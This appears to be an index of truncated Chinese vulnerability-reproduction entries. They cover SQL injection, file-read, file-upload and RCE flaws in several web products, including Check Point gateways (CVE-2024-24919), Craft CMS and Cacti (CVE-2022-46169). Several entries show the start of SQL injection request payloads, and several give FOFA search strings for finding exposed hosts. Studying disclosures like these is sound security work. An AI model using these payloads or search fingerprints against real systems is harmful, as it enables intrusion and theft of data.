C16-3喰星云-数字化餐饮服务系统-SQL 漏洞复现: payload: GET /logistics/home_warning/php/stock.php?do=getList&lsid=(SELECT+(CASE+WHEN+(6191=6193)+THEN+%27%27+ELSE+(SELEC
C16-2喰星云-数字化餐饮服务系统-SQL 漏洞复现: payload: GET /logistics/home_warning/php/not_finish.php?do=getList&lsid=(SELECT+(CASE+WHEN+(6192=6193)+THEN+''+ELSE+(SELE
C16-1喰星云-数字化餐饮服务系统-SQL 漏洞复现: payload: GET /logistics/home_warning/php/not_out_depot.php?do=getList&lsid= HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Maci
C15-2超级猫-签名APP分发平台-任意文件读取 漏洞描述: 超级猫超级签名分发平台是一个安卓苹果APP分发平台,能够对所有安卓苹果的APP进行签名分发,使所有自行开发的APP能够签名使用,包括登录注册等功能,还提供有SDK fofa语法: “/themes/97013266/public/sta
C15-1超级猫-签名APP分发平台-SQL 漏洞描述: 超级猫超级签名分发平台是一个安卓苹果APP分发平台,能够对所有安卓苹果的APP进行签名分发,使所有自行开发的APP能够签名使用,包括登录注册等功能,还提供有SDK 网站图片: fofa语法: “/themes/97013266/public/
C14-1创客13星-零售商城系统-任意文件上传 fofa语法: “/Public/Xin/static/css/iconfont.css” 漏洞复现: payload: POST /Login/shangchuan HTTP/1.1 Accept: text/html,application/xh
C12-1CheckPoint-安全网关-任意文件读取 漏洞描述: Check Point Security Gateways 任意文件读取漏洞(CVE-2024-24919)存在在野利用,远程攻击者可以通过构造恶意请求读取服务器上的任意文件,造成敏感信息的泄漏。目前,此漏洞已检测到在野利用。鉴于该
C11-1CraftCMS-开源的内容管理系统-RCE 漏洞描述: Craft CMS在4.4.15版本之前存在远程代码执行漏洞,攻击者可构造恶意请求执行任意代码,控制服务器。 影响版本: 4.0.0-RC1 <= Craft CMS <= 4.4.14 网站图片: fofa语法: title==“
C7-2Cacti-RCE 漏洞描述: Cacti项目是一个开源平台,可为用户提供强大且可扩展的操作监控和故障管理框架。在1.2.22版本中存在一处命令注入漏洞,攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令。漏洞编号:CVE-2022-46169,漏洞等级:严
C6-2Cellinx-NVT摄像机-任意文件读取 漏洞描述: Cellinx NVT v1.0.6.002b版本存在安全漏洞,该漏洞源于存在本地文件泄露漏洞,攻击者可读取系统密码等敏感信息。 网站图片: 网络测绘: fofa语法: FOFA:body=“local/NVT-string.js”<